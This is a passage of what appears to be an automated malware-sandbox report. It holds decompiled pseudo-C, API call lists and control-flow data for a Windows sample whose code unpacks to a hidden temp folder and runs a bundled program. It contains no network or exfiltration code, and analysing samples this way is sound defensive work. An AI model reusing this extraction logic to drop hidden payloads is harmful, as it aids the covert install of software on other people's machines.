                                                                                                                                                                                                        																					_t109 = 0xc91e4;
                                                                                                                                                                                                        																					E000C1781(0xc91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E000C5467(0xc91e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E000C2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E000C597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E000C5467(0xc91e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0xc91e4;
                                                                                                                                                                                                        											_t70 = E000C2630(0, 0xc91e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0xc91e4;
                                                                                                                                                                                                        												_t71 = E000C5467(0xc91e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E000C597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xc8b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E000C5467(0xc8b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E000C44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E000C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E000C6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x000c55ab
                                                                                                                                                                                                        0x000c55b2
                                                                                                                                                                                                        0x000c55c9
                                                                                                                                                                                                        0x000c55d5
                                                                                                                                                                                                        0x000c55d9
                                                                                                                                                                                                        0x000c5600
                                                                                                                                                                                                        0x000c5605
                                                                                                                                                                                                        0x000c560a
                                                                                                                                                                                                        0x000c560c
                                                                                                                                                                                                        0x000c5638
                                                                                                                                                                                                        0x000c5641
                                                                                                                                                                                                        0x000c5643
                                                                                                                                                                                                        0x000c5645
                                                                                                                                                                                                        0x000c5645
                                                                                                                                                                                                        0x000c564c
                                                                                                                                                                                                        0x000c5652
                                                                                                                                                                                                        0x000c5657
                                                                                                                                                                                                        0x000c5659
                                                                                                                                                                                                        0x000c5696
                                                                                                                                                                                                        0x000c569c
                                                                                                                                                                                                        0x000c589f
                                                                                                                                                                                                        0x000c58a7
                                                                                                                                                                                                        0x000c58ac
                                                                                                                                                                                                        0x000c58b3
                                                                                                                                                                                                        0x000c58b5
                                                                                                                                                                                                        0x000c56a2
                                                                                                                                                                                                        0x000c56a2
                                                                                                                                                                                                        0x000c56a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c56ae
                                                                                                                                                                                                        0x000c56ae
                                                                                                                                                                                                        0x000c56b9
                                                                                                                                                                                                        0x000c56bf
                                                                                                                                                                                                        0x000c56c1
                                                                                                                                                                                                        0x000c56f3
                                                                                                                                                                                                        0x000c56f3
                                                                                                                                                                                                        0x000c5705
                                                                                                                                                                                                        0x000c570a
                                                                                                                                                                                                        0x000c5711
                                                                                                                                                                                                        0x000c5717
                                                                                                                                                                                                        0x000c5724
                                                                                                                                                                                                        0x000c5726
                                                                                                                                                                                                        0x000c5729
                                                                                                                                                                                                        0x000c5730
                                                                                                                                                                                                        0x000c5737
                                                                                                                                                                                                        0x000c573d
                                                                                                                                                                                                        0x000c5740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c572b
                                                                                                                                                                                                        0x000c572b
                                                                                                                                                                                                        0x000c572e
                                                                                                                                                                                                        0x000c5742
                                                                                                                                                                                                        0x000c5742
                                                                                                                                                                                                        0x000c5745
                                                                                                                                                                                                        0x000c576b
                                                                                                                                                                                                        0x000c576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5747
                                                                                                                                                                                                        0x000c5747
                                                                                                                                                                                                        0x000c574d
                                                                                                                                                                                                        0x000c574f
                                                                                                                                                                                                        0x000c5771
                                                                                                                                                                                                        0x000c5771
                                                                                                                                                                                                        0x000c5773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5751
                                                                                                                                                                                                        0x000c5751
                                                                                                                                                                                                        0x000c5753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5755
                                                                                                                                                                                                        0x000c575b
                                                                                                                                                                                                        0x000c5760
                                                                                                                                                                                                        0x000c5762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5764
                                                                                                                                                                                                        0x000c5764
                                                                                                                                                                                                        0x000c5769
                                                                                                                                                                                                        0x000c577e
                                                                                                                                                                                                        0x000c577e
                                                                                                                                                                                                        0x000c5781
                                                                                                                                                                                                        0x000c5788
                                                                                                                                                                                                        0x000c578d
                                                                                                                                                                                                        0x000c578f
                                                                                                                                                                                                        0x000c57b2
                                                                                                                                                                                                        0x000c57b8
                                                                                                                                                                                                        0x000c57bd
                                                                                                                                                                                                        0x000c57bf
                                                                                                                                                                                                        0x000c57cd
                                                                                                                                                                                                        0x000c57cd
                                                                                                                                                                                                        0x000c57dd
                                                                                                                                                                                                        0x000c57e3
                                                                                                                                                                                                        0x000c57ef
                                                                                                                                                                                                        0x000c57f5
                                                                                                                                                                                                        0x000c57f8
                                                                                                                                                                                                        0x000c580a
                                                                                                                                                                                                        0x000c580a
                                                                                                                                                                                                        0x000c57fa
                                                                                                                                                                                                        0x000c5802
                                                                                                                                                                                                        0x000c5802
                                                                                                                                                                                                        0x000c580d
                                                                                                                                                                                                        0x000c580f
                                                                                                                                                                                                        0x000c5830
                                                                                                                                                                                                        0x000c5836
                                                                                                                                                                                                        0x000c583d
                                                                                                                                                                                                        0x000c584b
                                                                                                                                                                                                        0x000c5851
                                                                                                                                                                                                        0x000c5855
                                                                                                                                                                                                        0x000c585a
                                                                                                                                                                                                        0x000c585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c585e
                                                                                                                                                                                                        0x000c585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c585e
                                                                                                                                                                                                        0x000c5811
                                                                                                                                                                                                        0x000c5817
                                                                                                                                                                                                        0x000c5819
                                                                                                                                                                                                        0x000c581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c581f
                                                                                                                                                                                                        0x000c5791
                                                                                                                                                                                                        0x000c5797
                                                                                                                                                                                                        0x000c579c
                                                                                                                                                                                                        0x000c579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c57a0
                                                                                                                                                                                                        0x000c57a9
                                                                                                                                                                                                        0x000c57ae
                                                                                                                                                                                                        0x000c57b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c57b0
                                                                                                                                                                                                        0x000c579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5769
                                                                                                                                                                                                        0x000c5762
                                                                                                                                                                                                        0x000c5753
                                                                                                                                                                                                        0x000c574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5864
                                                                                                                                                                                                        0x000c5864
                                                                                                                                                                                                        0x000c5864
                                                                                                                                                                                                        0x000c5717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c56c3
                                                                                                                                                                                                        0x000c56c5
                                                                                                                                                                                                        0x000c56c9
                                                                                                                                                                                                        0x000c56ce
                                                                                                                                                                                                        0x000c56d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c56d6
                                                                                                                                                                                                        0x000c56d6
                                                                                                                                                                                                        0x000c56d8
                                                                                                                                                                                                        0x000c56dd
                                                                                                                                                                                                        0x000c56df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c56e1
                                                                                                                                                                                                        0x000c56e2
                                                                                                                                                                                                        0x000c56e4
                                                                                                                                                                                                        0x000c56e6
                                                                                                                                                                                                        0x000c56eb
                                                                                                                                                                                                        0x000c56ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c56f3
                                                                                                                                                                                                        0x000c56f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c586c
                                                                                                                                                                                                        0x000c5878
                                                                                                                                                                                                        0x000c587e
                                                                                                                                                                                                        0x000c5882
                                                                                                                                                                                                        0x000c5883
                                                                                                                                                                                                        0x000c5889
                                                                                                                                                                                                        0x000c588e
                                                                                                                                                                                                        0x000c588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5896
                                                                                                                                                                                                        0x000c56ed
                                                                                                                                                                                                        0x000c56df
                                                                                                                                                                                                        0x000c56d0
                                                                                                                                                                                                        0x000c56c1
                                                                                                                                                                                                        0x000c56a8
                                                                                                                                                                                                        0x000c565b
                                                                                                                                                                                                        0x000c565b
                                                                                                                                                                                                        0x000c565d
                                                                                                                                                                                                        0x000c5669
                                                                                                                                                                                                        0x000c5669
                                                                                                                                                                                                        0x000c565f
                                                                                                                                                                                                        0x000c565f
                                                                                                                                                                                                        0x000c5665
                                                                                                                                                                                                        0x000c5667
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5667
                                                                                                                                                                                                        0x000c566c
                                                                                                                                                                                                        0x000c5673
                                                                                                                                                                                                        0x000c5678
                                                                                                                                                                                                        0x000c567a
                                                                                                                                                                                                        0x000c589b
                                                                                                                                                                                                        0x000c589b
                                                                                                                                                                                                        0x000c5680
                                                                                                                                                                                                        0x000c5685
                                                                                                                                                                                                        0x000c568c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c568c
                                                                                                                                                                                                        0x000c567a
                                                                                                                                                                                                        0x000c560e
                                                                                                                                                                                                        0x000c5613
                                                                                                                                                                                                        0x000c561a
                                                                                                                                                                                                        0x000c5620
                                                                                                                                                                                                        0x000c5626
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5626
                                                                                                                                                                                                        0x000c55db
                                                                                                                                                                                                        0x000c55e0
                                                                                                                                                                                                        0x000c55e7
                                                                                                                                                                                                        0x000c55f1
                                                                                                                                                                                                        0x000c55f6
                                                                                                                                                                                                        0x000c55f6
                                                                                                                                                                                                        0x000c55f6
                                                                                                                                                                                                        0x000c58b7
                                                                                                                                                                                                        0x000c58c7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000C55CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 000C5638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 000C564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 000C5620
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 000C56B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 000C571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 000C5737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000C57CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000C57EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 000C5802
                                                                                                                                                                                                          • Part of subcall function 000C2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 000C2654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 000C5830
                                                                                                                                                                                                          • Part of subcall function 000C6517: FindResourceA.KERNEL32(000C0000,000007D6,00000005), ref: 000C652A
                                                                                                                                                                                                          • Part of subcall function 000C6517: LoadResource.KERNEL32(000C0000,00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000C6538
                                                                                                                                                                                                          • Part of subcall function 000C6517: DialogBoxIndirectParamA.USER32(000C0000,00000000,00000547,000C19E0,00000000), ref: 000C6557
                                                                                                                                                                                                          • Part of subcall function 000C6517: FreeResource.KERNEL32(00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000C6560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 000C5878
                                                                                                                                                                                                          • Part of subcall function 000C597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000C59A8
                                                                                                                                                                                                          • Part of subcall function 000C597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000C59AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-1384155332
                                                                                                                                                                                                        • Opcode ID: c1345bc44ad1343a457306c2c8a784301d89419ab545d00dca03d60b50f74ef3
                                                                                                                                                                                                        • Instruction ID: 170b7ffc078a3a70c09d65a58c8672aaa2b0ec53c05120b71fb14d277f5cfe58
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1345bc44ad1343a457306c2c8a784301d89419ab545d00dca03d60b50f74ef3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03817B78B04A049BEB609B709C85FFE72AD9F51346F14016DF986E3192DF74ADC58A10
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 c597d-c59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 c59dd-c5a1b GetDiskFreeSpaceA 324->325 326 c59bb-c59d8 call c44b9 call c6285 324->326 328 c5ba1-c5bde memset call c6285 GetLastError FormatMessageA 325->328 329 c5a21-c5a4a MulDiv 325->329 345 c5c05-c5c14 call c6ce0 326->345 339 c5be3-c5bfc call c44b9 SetCurrentDirectoryA 328->339 329->328 332 c5a50-c5a6c GetVolumeInformationA 329->332 335 c5a6e-c5ab0 memset call c6285 GetLastError FormatMessageA 332->335 336 c5ab5-c5aca SetCurrentDirectoryA 332->336 335->339 337 c5acc-c5ad1 336->337 343 c5ae2-c5ae4 337->343 344 c5ad3-c5ad8 337->344 351 c5c02 339->351 349 c5ae6 343->349 350 c5ae7-c5af8 343->350 344->343 347 c5ada-c5ae0 344->347 347->337 347->343 349->350 353 c5af9-c5afb 350->353 354 c5c04 351->354 355 c5afd-c5b03 353->355 356 c5b05-c5b08 353->356 354->345 355->353 355->356 357 c5b0a-c5b1b call c44b9 356->357 358 c5b20-c5b27 356->358 357->351 360 c5b29-c5b33 358->360 361 c5b52-c5b5b 358->361 360->361 362 c5b35-c5b50 360->362 363 c5b62-c5b6d 361->363 362->363 365 c5b6f-c5b74 363->365 366 c5b76-c5b7d 363->366 367 c5b85 365->367 368 c5b7f-c5b81 366->368 369 c5b83 366->369 370 c5b96-c5b9f 367->370 371 c5b87-c5b94 call c268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E000C597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                        				signed short _t78;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                        				unsigned int _t103;
                                                                                                                                                                                                        				unsigned int _t105;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				long _t112;
                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t114 = __edi;
                                                                                                                                                                                                        				_t46 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                        				_v804 = __edx;
                                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					_v796 = 0;
                                                                                                                                                                                                        					_v792 = 0;
                                                                                                                                                                                                        					_v800 = 0;
                                                                                                                                                                                                        					_v808 = 0;
                                                                                                                                                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                        						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        						 *0xc9124 = E000C6285();
                                                                                                                                                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        						_t110 = 0x4b0;
                                                                                                                                                                                                        						L30:
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						E000C44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                        						_pop(_t114);
                                                                                                                                                                                                        						goto L33;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t69 = _v792 * _v796;
                                                                                                                                                                                                        					_v812 = _t69;
                                                                                                                                                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                        					__eflags = _t116;
                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                        					__eflags = _t73;
                                                                                                                                                                                                        					if(_t73 != 0) {
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                        						_t101 =  &_v16;
                                                                                                                                                                                                        						_t111 = 6;
                                                                                                                                                                                                        						_t119 = _t118 - _t101;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                        							__eflags = _t22;
                                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t101 = _t87;
                                                                                                                                                                                                        							_t101 = _t101 + 1;
                                                                                                                                                                                                        							_t111 = _t111 - 1;
                                                                                                                                                                                                        							__eflags = _t111;
                                                                                                                                                                                                        							if(_t111 != 0) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t111;
                                                                                                                                                                                                        						if(_t111 == 0) {
                                                                                                                                                                                                        							_t101 = _t101 - 1;
                                                                                                                                                                                                        							__eflags = _t101;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t101 = 0;
                                                                                                                                                                                                        						_t112 = 0x200;
                                                                                                                                                                                                        						_t102 = _v812;
                                                                                                                                                                                                        						_t78 = 0;
                                                                                                                                                                                                        						_t118 = 8;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _t102 - _t112;
                                                                                                                                                                                                        							if(_t102 == _t112) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t112 = _t112 + _t112;
                                                                                                                                                                                                        							_t78 = _t78 + 1;
                                                                                                                                                                                                        							__eflags = _t78 - _t118;
                                                                                                                                                                                                        							if(_t78 < _t118) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t78 - _t118;
                                                                                                                                                                                                        						if(_t78 != _t118) {
                                                                                                                                                                                                        							__eflags =  *0xc9a34 & 0x00000008;
                                                                                                                                                                                                        							if(( *0xc9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                        								_t103 =  *0xc9a38; // 0x0
                                                                                                                                                                                                        								_t110 =  *((intOrPtr*)(0xc89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                        									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                        										__eflags = _t103 - _t116;
                                                                                                                                                                                                        									} else {
